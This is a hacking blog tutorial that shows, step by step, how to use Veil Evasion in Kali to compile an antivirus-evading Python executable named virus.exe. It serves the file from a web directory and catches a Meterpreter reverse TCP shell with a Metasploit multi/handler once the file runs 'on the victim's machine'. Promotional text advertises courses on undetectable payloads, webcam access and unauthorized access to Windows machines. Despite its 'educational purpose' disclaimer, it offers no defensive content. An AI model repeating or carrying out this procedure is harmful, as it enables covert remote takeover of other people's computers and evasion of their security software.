Learn how to bypass antivirus to perform windows hacking(ONLY FOR EDUCATIONAL PURPOSE)

INTRODUCTION

Hello everyone, In the previous article we have seen how we can hack windows machine through metasploit. But the major issue in creating a payload with metasploit is that your payload will get detected by antivirus. This is because most of the antivirus nowadays have the signature of metasploit’s payload. Therefore, In this article we are going to see that how we can bypass antivirus by encrypting the signature of payload.

AnnouncementIf you want to learn how hackers hack millions of accounts on a website, Then check out this beginner friendly course which will teach you how to perform account takeovers in real world websites that will boost your bug bounty hunting skills from basics to advance level.

HOW ANTIVIRUS WORKS?

Before we jump into “Bypassing antivirus”, we must have a basic knowledge of how antivirus works right? So, let’s find out.

Basically, there are two ways by which antivirus distinguish between a normal file and a virus:

  1. Signature Based Antivirus: These type of antivirus contains huge amount of virus’s signatures in their database. When a file enters in the computer, it will match the signature of that file with all the virus’s signatures and if any match found then it will flag that file as Malware. As a result, their scanning speed is quite good but the accuracy is poor since any virus that is not present in the antivirus’s database can easily get executed on the computer.
  2. Sandbox Based Antivirus: These type of antivirus have the most accuracy but low speed. This is because they executes the file in a virtual environment and the flag it either as normal file or malware by monitoring their behavior.

Most of the personal computers have signature based antivirus installed in their machine.

Now that we have understood how antivirus works, let us learn how we can create a payload that can bypass antivirus.

WINDOWS HACKING: BYPASSING AV

INSTALLING VEIL EVASION

First of all, we need to install veil evasion tool in our machine. To install it in Kali Linux, follow the steps:

1. In Kali terminal, type sudo apt install veil -y.

windows hacking main
Windows Hacking: Installing Veil

2. After this, type veil in the terminal and complete the installation process. Veil will be installed in your machine.

CREATING PAYLOAD

Follow the given steps to create a payload using veil:

1. Type sudo veil in the terminal and hit enter.

2. Here, we need to choose Evasion since we want to evade(bypass) antivirus. Therefore, type use 1 and hit enter.

3. In the figure above, you can see that there are 41 payloads loaded. Type list to view each of them.

4. We are going to use the payload on 28th position. So, type use 28 and hit enter.

5. After that you need to configure your LHOST and LPORT and then type generate as shown in the figure below.

SET LHOST <YOUR_LOCAL_IP>
SET LPORT <YOUR_LOCAL_PORT>

6. Now veil will ask you to name the output file. After naming the file, It will ask you to choose PyInstalller or Py2Exe. In simple terms, both of these tools are used to create an windows executable file(exe) from python file(.py). We are going to choose 1 because PyInstaller is somewhat more reliable that Py2Exe.

7.Finally, our payload will be created.

The file is stored in /var/lib/veil/output/compiled/ directory. We can move the file by typing the simple command:

sudo mv /var/lib/veil/output/compiled/virus.exe <Your Directory>
Eg:
sudo mv /var/lib/veil/output/compiled/virus.exe /var/www/html/

And That’s it! We now have created a payload that is undetectable by antivirus. I have scanned the file with Quick Heal Total Security and the result is attached below:

Now, we can start our listener from metasploit. If you don’t know about Listener and Payload then check out this article for reference.

Listener command:

msfconsole
use exploit/multi/handler
set payload windows/python/meterpreter/reverse_tcp
set LHOST <Your_Local_IP>
set LPORT <Your_Local_Port>
exploit

After starting the listener, execute our virus.exe payload on the victim’s machine and you will get a meterpreter shell on the Kali terminal!

If you want to learn windows hacking in depth then i recommend you to check out this amazing beginner friendly course on “Hacking Windows With Python From Scratch(2022)” in which you will learn:

  • Creating Undetectable Payload
  • Execute shell commands, download and upload files and access webcam.
  • Hack any windows based machine and get full access.
  • Bind payload with any files.
  • How black hat hackers get unauthorized access to windows machine.

Click here to visit the course.

CONCLUSION

I hope that you all have understood how we can create a payload that can be used to bypass antivirus using veil evasion. If you have any doubts or issues then please let me know in the comment section.

Join our telegram channel here and stay updated with our latest contents.

Subscribe to our YouTube channel for latest cybersecurity videos.

Are you a bug bounty hunter? Check out our Account Takeover Lab and practice your skills ethically:

Lab 1 Lab 2 Lab 3 Lab 4 Lab 5